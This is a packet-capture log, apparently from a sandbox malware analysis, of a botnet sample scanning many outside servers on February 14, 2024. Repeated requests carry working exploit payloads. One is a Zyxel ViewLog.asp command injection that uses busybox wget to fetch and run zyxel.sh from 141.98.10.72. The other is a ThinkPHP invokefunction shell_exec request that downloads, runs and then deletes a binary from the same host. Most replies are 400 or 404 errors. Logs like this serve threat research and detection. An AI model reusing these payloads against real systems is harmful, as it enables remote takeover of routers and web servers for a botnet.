                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:54.827162981 CET625INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:29:54 GMT
                                                      Content-Length: 489
                                                      Content-Type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 61 74 65 64 69 65 72 2f 66 72 70 22 3e 66 72 70 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 66 72 70 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html><head><title>Not Found</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>The page you requested was not found.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>The server is powered by <a href="https://github.com/fatedier/frp">frp</a>.</p><p><em>Faithfully yours, frp.</em></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      445192.168.2.155287694.110.27.448080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.637466908 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      446192.168.2.154912694.120.242.848080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.697021961 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      447192.168.2.154115285.140.44.1968080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.697871923 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      448192.168.2.154509862.29.52.1588080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.698153019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      449192.168.2.1533192112.74.18.10680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.963769913 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:55.310220003 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.22.1
                                                      Date: Wed, 14 Feb 2024 08:29:55 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      450192.168.2.155873495.101.16.15180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.519558907 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.736268997 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 63 37 35 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 36 26 23 34 36 3b 64 33 37 62 62 63 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;8c757b5c&#46;1707899396&#46;d37bbc6</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      451192.168.2.154401495.101.19.6380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.521559000 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.740432978 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 65 37 35 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 36 26 23 34 36 3b 64 62 35 30 39 62 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;8e757b5c&#46;1707899396&#46;db509b6</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      452192.168.2.154413295.217.150.10880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.522496939 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.742033005 CET404INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Server: Apache
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      453192.168.2.155172095.216.18.10180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.523010969 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.743269920 CET115INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/plain; charset=utf-8
                                                      Connection: close
                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                      Data Ascii: 400 Bad Request


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      454192.168.2.153467295.217.203.25180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.523072004 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.743139982 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      455192.168.2.153448495.100.136.4080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.539232969 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.775530100 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 34 38 36 62 61 35 64 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 36 26 23 34 36 3b 36 65 66 37 31 36 63 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;e486ba5d&#46;1707899396&#46;6ef716cb</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      456192.168.2.155148695.80.219.17480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.726003885 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.932348013 CET372INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      strict-transport-security: max-age=31536000; includeSubDomains;
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      457192.168.2.154940295.111.254.5780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.727571011 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.935697079 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      458192.168.2.154944895.100.51.15080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.731548071 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.941863060 CET478INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 256
                                                      Expires: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 31 36 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 36 26 23 34 36 3b 61 34 64 64 39 37 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4161502&#46;1707899396&#46;a4dd978</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      459192.168.2.153580895.101.188.3080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.736509085 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.951642990 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:56 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 65 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 36 26 23 34 36 3b 61 61 61 30 64 30 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3e0b1502&#46;1707899396&#46;aaa0d0c</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      460192.168.2.155220895.110.208.13780
